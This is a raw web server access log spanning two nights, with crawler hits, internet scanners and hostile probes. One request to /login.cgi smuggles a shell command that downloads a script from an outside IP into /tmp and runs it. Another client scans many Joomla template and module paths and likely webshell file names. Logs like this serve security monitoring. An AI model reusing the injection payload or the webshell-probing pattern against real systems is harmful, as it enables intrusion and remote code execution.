154.81.156.10 - - [31/Mar/2025:22:34:50 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
151.106.162.202 - - [31/Mar/2025:22:44:40 +0200] "GET /gallery/image.php?mode=thumbnail&album_id=8&image_id=107&sid=0c8d4ca51199da22788c2a1ef7454de6 HTTP/1.1" 404 297 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
151.106.162.202 - - [31/Mar/2025:22:44:45 +0200] "GET /gallery/image.php?mode=thumbnail&album_id=8&image_id=107&sid=0c8d4ca51199da22788c2a1ef7454de6 HTTP/1.1" 404 297 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
151.106.162.202 - - [31/Mar/2025:22:44:47 +0200] "GET /gallery/image.php?mode=thumbnail&album_id=8&image_id=107&sid=0c8d4ca51199da22788c2a1ef7454de6 HTTP/1.1" 404 297 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
154.81.156.35 - - [31/Mar/2025:22:51:22 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
151.106.162.202 - - [31/Mar/2025:23:00:18 +0200] "GET /download/file.php?id=255&sid=d75a97c061b522f01c6747d240bc0429 HTTP/1.1" 404 297 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
151.106.162.202 - - [31/Mar/2025:23:00:18 +0200] "GET /download/file.php?id=255&sid=d75a97c061b522f01c6747d240bc0429 HTTP/1.1" 404 297 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
151.106.162.202 - - [31/Mar/2025:23:00:19 +0200] "GET /download/file.php?id=255&sid=d75a97c061b522f01c6747d240bc0429 HTTP/1.1" 404 297 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
204.76.203.15 - - [31/Mar/2025:23:13:26 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
20.98.142.117 - - [31/Mar/2025:23:25:58 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 zgrab/0.x"
195.178.110.224 - - [31/Mar/2025:23:27:48 +0200] "GET / HTTP/1.0" 200 423 "-" "-"
88.214.25.123 - - [31/Mar/2025:23:35:44 +0200] "\x03" 400 383 "-" "-"
156.59.198.135 - - [31/Mar/2025:23:46:00 +0200] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/10764454.pdf HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
45.128.38.94 - - [01/Apr/2025:00:32:08 +0200] "GET /index.php HTTP/1.0" 200 423 "http://triadian.castlegem.co.uk/index.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Avast/131.0.0.0"
154.81.156.35 - - [01/Apr/2025:00:38:01 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
47.121.133.117 - - [01/Apr/2025:00:41:36 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://104.248.224.147/sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1" 400 296 "-" "Hakai/2.0"
156.59.198.135 - - [01/Apr/2025:00:43:22 +0200] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/10883772.pdf HTTP/1.0" 404 323 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
122.117.24.23 - - [01/Apr/2025:00:46:24 +0200] "GET / HTTP/1.0" 200 423 "-" "curl/7.88.1"
173.249.43.239 - - [01/Apr/2025:00:49:04 +0200] "GET /modules/mod_araticlws/mod_araticlws.php HTTP/1.1" 404 308 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
173.249.43.239 - - [01/Apr/2025:00:49:10 +0200] "GET /modules/mod_ariimageslidersa/mod_ariimageslidersa.php HTTP/1.1" 404 314 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
173.249.43.239 - - [01/Apr/2025:00:49:17 +0200] "GET /templates/atomic/error.php HTTP/1.1" 404 308 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
173.249.43.239 - - [01/Apr/2025:00:49:20 +0200] "GET /administrator/templates/bluestork/error.php HTTP/1.1" 404 318 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
173.249.43.239 - - [01/Apr/2025:00:49:23 +0200] "GET /administrator/templates/hathor/index.php HTTP/1.1" 404 317 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
173.249.43.239 - - [01/Apr/2025:00:49:26 +0200] "GET /administrator/templates/hathor/error.php HTTP/1.1" 404 316 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
173.249.43.239 - - [01/Apr/2025:00:49:30 +0200] "GET /administrator/templates/isis/index.php HTTP/1.1" 404 316 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
173.249.43.239 - - [01/Apr/2025:00:49:35 +0200] "GET /administrator/templates/isis/error.php HTTP/1.1" 404 315 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
173.249.43.239 - - [01/Apr/2025:00:49:40 +0200] "GET /modules/mod_simplefileuploadv1.3/elements/udd.php HTTP/1.1" 404 322 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
173.249.43.239 - - [01/Apr/2025:00:49:43 +0200] "GET /templates/beez/index.php HTTP/1.1" 404 308 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
173.249.43.239 - - [01/Apr/2025:00:49:48 +0200] "GET /templates/beez3/index.php HTTP/1.1" 404 309 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
173.249.43.239 - - [01/Apr/2025:00:49:52 +0200] "GET /templates/beez3/error.php HTTP/1.1" 404 309 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
173.249.43.239 - - [01/Apr/2025:00:49:56 +0200] "GET /templates/beez5/index.php HTTP/1.1" 404 309 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
173.249.43.239 - - [01/Apr/2025:00:50:01 +0200] "GET /templates/beez5/error.php HTTP/1.1" 404 308 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
173.249.43.239 - - [01/Apr/2025:00:50:05 +0200] "GET /templates/beez_20/index.php HTTP/1.1" 404 310 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
173.249.43.239 - - [01/Apr/2025:00:50:10 +0200] "GET /templates/beez_20/error.php HTTP/1.1" 404 310 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
173.249.43.239 - - [01/Apr/2025:00:50:14 +0200] "GET /templates/protostar/index.php HTTP/1.1" 404 310 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
173.249.43.239 - - [01/Apr/2025:00:50:19 +0200] "GET /templates/protostar/error.php HTTP/1.1" 404 309 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
173.249.43.239 - - [01/Apr/2025:00:50:24 +0200] "GET /templates/atomic/index.php HTTP/1.1" 404 309 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
173.249.43.239 - - [01/Apr/2025:00:50:28 +0200] "GET /templates/atomic/error.php HTTP/1.1" 404 308 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
173.249.43.239 - - [01/Apr/2025:00:50:33 +0200] "GET /modules/mod_simplefileuploadv1.3/elements/wcg9LbOHD14.php HTTP/1.1" 404 329 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
173.249.43.239 - - [01/Apr/2025:00:50:38 +0200] "GET /modules/mod_ariimageslidersa/mod_ariimageslidersa.php HTTP/1.1" 404 314 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
173.249.43.239 - - [01/Apr/2025:00:50:42 +0200] "GET /modules/mod_simplefileuploadv1.3/elements/3so.php HTTP/1.1" 404 322 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
173.249.43.239 - - [01/Apr/2025:00:50:47 +0200] "GET /modules/mod_webshell/mod_webshell.php HTTP/1.1" 404 308 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
173.249.43.239 - - [01/Apr/2025:00:50:49 +0200] "GET /modules/mod_simplefileuploadv1.3/elements/Clean.php HTTP/1.1" 404 323 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
154.81.156.10 - - [01/Apr/2025:00:51:07 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
156.59.198.135 - - [01/Apr/2025:01:16:29 +0200] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/10623307.pdf HTTP/1.0" 404 323 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
167.94.138.201 - - [01/Apr/2025:01:16:48 +0200] "\x05d\x05\xc9" 400 383 "-" "-"
206.168.34.216 - - [01/Apr/2025:01:22:30 +0200] "GET / HTTP/1.1" 200 423 "-" "-"
206.168.34.216 - - [01/Apr/2025:01:22:38 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
206.168.34.216 - - [01/Apr/2025:01:22:41 +0200] "GET /activities.ico HTTP/1.1" 200 1406 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
206.168.34.216 - - [01/Apr/2025:01:22:43 +0200] "GET /favicon.ico HTTP/1.1" 404 295 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
206.168.34.216 - - [01/Apr/2025:01:22:44 +0200] "PRI * HTTP/2.0" 400 383 "-" "-"
206.168.34.216 - - [01/Apr/2025:01:22:50 +0200] "GET /favicon.ico HTTP/1.1" 404 295 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
206.168.34.216 - - [01/Apr/2025:01:22:52 +0200] "\x16\x03\x01" 400 383 "-" "-"
175.137.160.241 - - [01/Apr/2025:01:27:37 +0200] "GET / HTTP/1.0" 200 423 "-" "curl/7.88.1"
43.130.110.130 - - [01/Apr/2025:01:27:53 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
80.82.77.202 - - [01/Apr/2025:01:41:06 +0200] "GET / HTTP/1.0" 200 423 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.100 Safari/537.36"
151.106.162.202 - - [01/Apr/2025:01:53:49 +0200] "GET /cron.php?cron_type=tidy_cache&sid=92a8ed5be9bfd274d80be71f0d8c53ff HTTP/1.1" 404 290 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
151.106.162.202 - - [01/Apr/2025:01:53:51 +0200] "GET /cron.php?cron_type=tidy_cache&sid=92a8ed5be9bfd274d80be71f0d8c53ff HTTP/1.1" 404 290 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
151.106.162.202 - - [01/Apr/2025:01:53:55 +0200] "GET /cron.php?cron_type=tidy_cache&sid=92a8ed5be9bfd274d80be71f0d8c53ff HTTP/1.1" 404 290 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"